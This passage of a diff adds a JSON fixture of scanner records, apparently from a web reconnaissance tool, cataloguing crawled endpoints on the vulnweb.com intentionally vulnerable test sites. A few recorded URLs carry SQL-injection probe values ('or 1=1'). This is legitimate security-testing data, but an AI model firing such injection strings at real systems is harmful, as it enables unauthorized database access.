+ "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 386, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/showthread.asp?id=49", + "content_length": 1208, + "page_title": "500 - Internal server error.", + "http_status": 500, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:17:09.026Z", + "response_time": 0.345460398, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 387, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/showthread.asp?id=47", + "content_length": 1208, + "page_title": "500 - Internal server error.", + "http_status": 500, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:17:09.142Z", + "response_time": 0.35891036200000004, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 388, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/showthread.asp?id=5", + "content_length": 1208, + "page_title": "500 - Internal server error.", + "http_status": 500, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:17:09.246Z", + "response_time": 0.353340189, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 389, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/showthread.asp?id=6", + "content_length": 1208, + "page_title": "500 - Internal server error.", + "http_status": 500, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:17:09.350Z", + "response_time": 0.357629831, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 390, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/showthread.asp?id=7", + "content_length": 1208, + "page_title": "500 - Internal server error.", + "http_status": 500, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:17:09.455Z", + "response_time": 0.349015291, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 391, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/showthread.asp?id=8", + "content_length": 1208, + "page_title": "500 - Internal server error.", + "http_status": 500, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:17:16.333Z", + "response_time": 0.345328109, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 392, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/showthread.asp?id=9", + "content_length": 1208, + "page_title": "500 - Internal server error.", + "http_status": 500, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:17:16.479Z", + "response_time": 0.35292454500000003, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 395, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/styles.css", + "content_length": 3390, + "page_title": null, + "http_status": 200, + "content_type": "text/css", + "discovered_date": "2024-11-13T02:17:16.858Z", + "response_time": 0.348047789, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 396, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/t/dot.gif", + "content_length": 43, + "page_title": null, + "http_status": 200, + "content_type": "image/gif", + "discovered_date": "2024-11-13T02:17:16.998Z", + "response_time": 0.35247942, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 399, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/t/fit.txt", + "content_length": 64, + "page_title": null, + "http_status": 200, + "content_type": "text/plain", + "discovered_date": "2024-11-13T02:17:17.371Z", + "response_time": 0.354716166, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 536, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/t/xss.html", + "content_length": 33, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:18:08.242Z", + "response_time": 0.353795366, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 608, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/t/xss.js", + "content_length": 27, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:18:30.767Z", + "response_time": 0.3457242, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 653, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp", + "content_length": 3192, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:18:42.834Z", + "response_time": 0.355234893, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 654, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2FRegister%2Easp", + "content_length": 3194, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:18:43.045Z", + "response_time": 0.356907622, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 655, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=/Default.asp", + "content_length": 3192, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:18:43.270Z", + "response_time": 0.340131723, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 656, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp", + "content_length": 3190, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:18:43.392Z", + "response_time": 0.35638716699999995, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 657, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=/Search.asp", + "content_length": 3190, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:18:43.520Z", + "response_time": 0.344350781, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 658, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=/Register.asp", + "content_length": 3194, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:18:43.657Z", + "response_time": 0.347431139, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 659, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2Flogin%2Easp", + "content_length": 3188, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:18:43.872Z", + "response_time": 0.35652037400000003, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 660, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=/login.asp", + "content_length": 3188, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:18:44.015Z", + "response_time": 0.34354186800000003, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 661, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp", + "content_length": 3609, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:18:44.157Z", + "response_time": 0.34787312400000003, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 662, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=%2FRegister%2Easp", + "content_length": 3611, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:18:44.380Z", + "response_time": 0.352551046, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 663, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp", + "content_length": 3607, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:18:44.506Z", + "response_time": 0.35099272000000004, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 664, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=%2Flogin%2Easp", + "content_length": 3605, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:18:44.810Z", + "response_time": 0.34711886500000005, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 665, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=/Default.asp", + "content_length": 3609, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:18:44.930Z", + "response_time": 0.348767112, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 666, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=/Search.asp", + "content_length": 3607, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:18:45.102Z", + "response_time": 0.352757116, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 667, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=/Register.asp", + "content_length": 3611, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:18:45.228Z", + "response_time": 0.356679531, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 668, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=/login.asp", + "content_length": 3605, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:18:45.357Z", + "response_time": 0.34964792499999997, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 669, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/T", + "content_length": 152, + "page_title": "Document Moved", + "http_status": 405, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:18:45.576Z", + "response_time": 0.352435914, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 679, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 76, + "source": null, + "http_url": "http://testaspnet.vulnweb.com/Comments.aspx?id=0", + "content_length": 13861, + "page_title": "Comments", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:18:51.141Z", + "response_time": 0.5390622110000001, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8, + 13 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 680, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 76, + "source": null, + "http_url": "http://testaspnet.vulnweb.com/Comments.aspx?id=1337", + "content_length": 13326, + "page_title": "Comments", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:18:51.267Z", + "response_time": 0.523391882, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 8, + 12, + 13 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 681, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 76, + "source": null, + "http_url": "http://testaspnet.vulnweb.com/Comments.aspx?id=2", + "content_length": 14399, + "page_title": "Comments", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:18:51.403Z", + "response_time": 0.514347717, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 8, + 12, + 13 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 682, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 76, + "source": null, + "http_url": "http://testaspnet.vulnweb.com/Comments.aspx?id=3", + "content_length": 14068, + "page_title": "Comments", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:18:51.540Z", + "response_time": 0.513509764, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8, + 13 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 683, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 76, + "source": null, + "http_url": "http://testaspnet.vulnweb.com/Comments.aspx?id=3-1", + "content_length": 14401, + "page_title": "Comments", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:18:51.683Z", + "response_time": 0.519209123, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 8, + 12, + 13 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 684, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 76, + "source": null, + "http_url": "http://testaspnet.vulnweb.com/Comments.aspx?id=999999%20or%201=1%20or%201=1", + "content_length": 13884, + "page_title": "Comments", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:18:51.820Z", + "response_time": 0.5263919650000001, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 8, + 12, + 13 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 685, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 76, + "source": null, + "http_url": "http://testaspnet.vulnweb.com/ReadNews.aspx?id=0", + "content_length": 22841, + "page_title": "ReadNews", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:18:51.971Z", + "response_time": 0.69206729, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 8, + 12, + 13 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 686, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 76, + "source": null, + "http_url": "http://testaspnet.vulnweb.com/ReadNews.aspx?id=1337", + "content_length": 13447, + "page_title": "ReadNews", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:18:52.115Z", + "response_time": 0.531771952, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 8, + 12, + 13 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 687, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 76, + "source": null, + "http_url": "http://testaspnet.vulnweb.com/acuservice/service.asmx?disco", + "content_length": 759, + "page_title": null, + "http_status": 200, + "content_type": "text/xml", + "discovered_date": "2024-11-13T02:18:52.254Z", + "response_time": 0.34360734000000004, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 8, + 12 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 688, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 76, + "source": null, + "http_url": "http://testaspnet.vulnweb.com/ReadNews.aspx?id=0&NewsAd=ads%2fdef.html", + "content_length": 22906, + "page_title": "ReadNews", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:18:52.376Z", + "response_time": 0.692459753, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 8, + 12, + 13 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 689, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 76, + "source": null, + "http_url": "http://testaspnet.vulnweb.com/acuservice/service.asmx", + "content_length": 5814, + "page_title": "Service Web Service", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:18:52.512Z", + "response_time": 0.518657167, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 8, + 12 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 690, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 76, + "source": null, + "http_url": "http://testaspnet.vulnweb.com/ReadNews.aspx?id=0&NewsAd=ads/def.html", + "content_length": 22906, + "page_title": "ReadNews", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:18:52.639Z", + "response_time": 0.7188760829999999, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 8, + 12, + 13 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 691, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 76, + "source": null, + "http_url": "http://testaspnet.vulnweb.com/acuservice/service.asmx?WSDL", + "content_length": 8524, + "page_title": null, + "http_status": 200, + "content_type": "text/xml", + "discovered_date": "2024-11-13T02:18:52.799Z", + "response_time": 0.517830721, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 692, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 76, + "source": null, + "http_url": "http://testaspnet.vulnweb.com/ReadNews.aspx?id=2", + "content_length": 30547, + "page_title": "ReadNews", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:18:52.939Z", + "response_time": 0.710570461, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 8, + 12, + 13 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 693, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 76, + "source": null, + "http_url": "http://testaspnet.vulnweb.com/ReadNews.aspx?id=2&NewsAd=ads/def.html", + "content_length": 30608, + "page_title": "ReadNews", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:18:53.112Z", + "response_time": 0.717151888, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 8, + 12, + 13 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 694, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 76, + "source": null, + "http_url": "http://testaspnet.vulnweb.com/about.aspx", + "content_length": 14621, + "page_title": "About", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:18:53.251Z", + "response_time": 0.528117199, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 8, + 12, + 13 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 695, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 76, + "source": null, + "http_url": "http://testaspnet.vulnweb.com/Signup.aspx", + "content_length": 13108, + "page_title": "Signup", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:18:53.379Z", + "response_time": 0.527755862, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 8, + 12, + 13 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 696, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 76, + "source": null, + "http_url": "http://testaspnet.vulnweb.com/ReadNews.aspx?id=2&NewsAd=ads%2fdef.html", + "content_length": 30608, + "page_title": "ReadNews", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:18:53.528Z", + "response_time": 0.711829882, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8, + 13 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 697, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 76, + "source": null, + "http_url": "http://testaspnet.vulnweb.com/ReadNews.aspx?id=3", + "content_length": 17981, + "page_title": "ReadNews", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:18:53.661Z", + "response_time": 0.728103527, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 8, + 12, + 13 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 698, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 76, + "source": null, + "http_url": "http://testaspnet.vulnweb.com/ReadNews.aspx?id=3&NewsAd=ads%2fdef.html", + "content_length": 18042, + "page_title": "ReadNews", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:18:53.795Z", + "response_time": 0.716713797, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8, + 13 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 699, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 76, + "source": null, + "http_url": "http://testaspnet.vulnweb.com/ReadNews.aspx?id=3&NewsAd=ads/def.html", + "content_length": 18042, + "page_title": "ReadNews", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:18:53.933Z", + "response_time": 0.684175941, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 8, + 12, + 13 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 700, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 76, + "source": null, + "http_url": "http://testaspnet.vulnweb.com/ReadNews.aspx?id=3-1", + "content_length": 30555, + "page_title": "ReadNews", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:18:54.069Z", + "response_time": 0.701525271, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 8, + 12, + 13 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 701, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 76, + "source": null, + "http_url": "http://testaspnet.vulnweb.com/ReadNews.aspx?id=999999%20or%201=1%20or%201=1", + "content_length": 22911, + "page_title": "ReadNews", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:18:54.197Z", + "response_time": 0.698413998, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 8, + 12, + 13 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 702, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 76, + "source": null, + "http_url": "http://testaspnet.vulnweb.com/Comments.aspx", + "content_length": 0, + "page_title": null, + "http_status": 200, + "content_type": "", + "discovered_date": "2024-11-13T02:18:54.320Z", + "response_time": 0.353304627, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 8, + 12 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 704, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 76, + "source": null, + "http_url": "http://testaspnet.vulnweb.com/acuservice/service.asmx?op=GetUserInfo", + "content_length": 7532, + "page_title": "Service Web Service", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:19:00.006Z", + "response_time": 0.517442767, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 8, + 12 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + 